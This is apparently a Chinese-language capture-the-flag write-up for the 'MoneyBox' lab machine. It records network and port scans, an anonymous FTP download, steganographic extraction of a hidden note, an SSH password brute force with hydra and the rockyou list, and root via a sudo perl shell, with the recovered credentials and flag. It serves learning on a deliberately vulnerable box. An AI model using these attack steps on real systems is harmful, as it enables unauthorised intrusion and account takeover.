main

arp-scan -l

1
2
3
4
5
6
Interface: eth0, type: EN10MB, MAC: 08:00:27:82:4b:5b, IPv4: 192.168.43.160
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.43.1	12:dd:b5:07:19:10	(Unknown: locally administered)
192.168.43.73	2c:9c:58:8e:96:a5	(Unknown)
192.168.43.74	08:00:27:cf:d8:16	PCS Systemtechnik GmbH
192.168.43.73	2c:9c:58:8e:96:a5	(Unknown) (DUP: 2)

nmap -p- -A -T5 192.168.43.73

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.43.160
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0         1093656 Feb 26  2021 trytofind.jpg
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 1e:30:ce:72:81:e0:a2:3d:5c:28:88:8b:12:ac:fa:ac (RSA)
|   256 01:9d:fa:fb:f2:06:37:c0:12:fc:01:8b:24:8f:53:ae (ECDSA)
|_  256 2f:34:b3:d0:74:b4:7f:8d:17:d2:37:b1:2e:32:f7:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: MoneyBox
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:CF:D8:16 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)

ftp匿名登录下载得到一个图片 trytofind.jpg

1
2
3
4
5
ftp 192.168.43.74
Anonymous
ls
get trytofind.jpg
exit

image-20250430143947039

扫描目录

gobuster dir -u $URL -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -k -t 30 -b “404,500”

1
[07:01:02] 301 -  314B  - /blogs  ->  http://192.168.43.74/blogs/

/blogs 源代码里

1
<!--the hint is the another secret directory is S3cr3t-T3xt-->

访问 /S3cr3t-T3xt ==》 key:3xtr4ctd4t4

1
2
3
<h1>I'm T0m-H4ck3r</h1><br>
    <p>I Already Hacked This Box and Informed.But They didn't Do any Security configuration</p>
    <p>If You Want Hint For Next Step......?<p>

==》

尝试 ssh 登录 T0m-H4ck3r:3xtr4ctd4t4 错误

爆破一下 /S3cr3t-T3xt 的参数无果

key 可能是提示,即 extract,应该就是从图片中提取隐藏信息

1
binwalk -e trytofind.jpg --run-as=root  //无果
1
2
3
4
5
steghide extract -sf trytofind.jpg
Enter passphrase: 
wrote extracted data to "data.txt".
                                                                                                                  
data.txt  reports  trytofind.jpg

得到 data.txt

1
2
3
4
Hello.....  renu

      I tell you something Important.Your Password is too Week So Change Your Password
Don't Underestimate it.......

得到用户名 renu

hydra -l renu -P /usr/share/wordlists/rockyou.txt ssh://192.168.43.74

密码爆破,成功登录

login: renu password: 987654321

renu 不方便提取,横向移动到 lily

ssh lily@127.0.0.1

1
2
3
4
5
6
lily@MoneyBox:~$ sudo -l
Matching Defaults entries for lily on MoneyBox:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User lily may run the following commands on MoneyBox:
    (ALL : ALL) NOPASSWD: /usr/bin/perl
1
sudo perl -e 'exec "/bin/sh";'

提权成功

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
root@MoneyBox:~# cat .root.txt

Congratulations.......!

You Successfully completed MoneyBox

Finally The Root Flag
    ==> r00t{H4ckth3p14n3t}

I'm Kirthik-KarvendhanT
    It's My First CTF Box
         
instagram : ____kirthik____

See You Back....

后记

整体常规,但需要补一下关于图像隐写和提取的小知识(在一个图片中塞了一个 .txt 文件)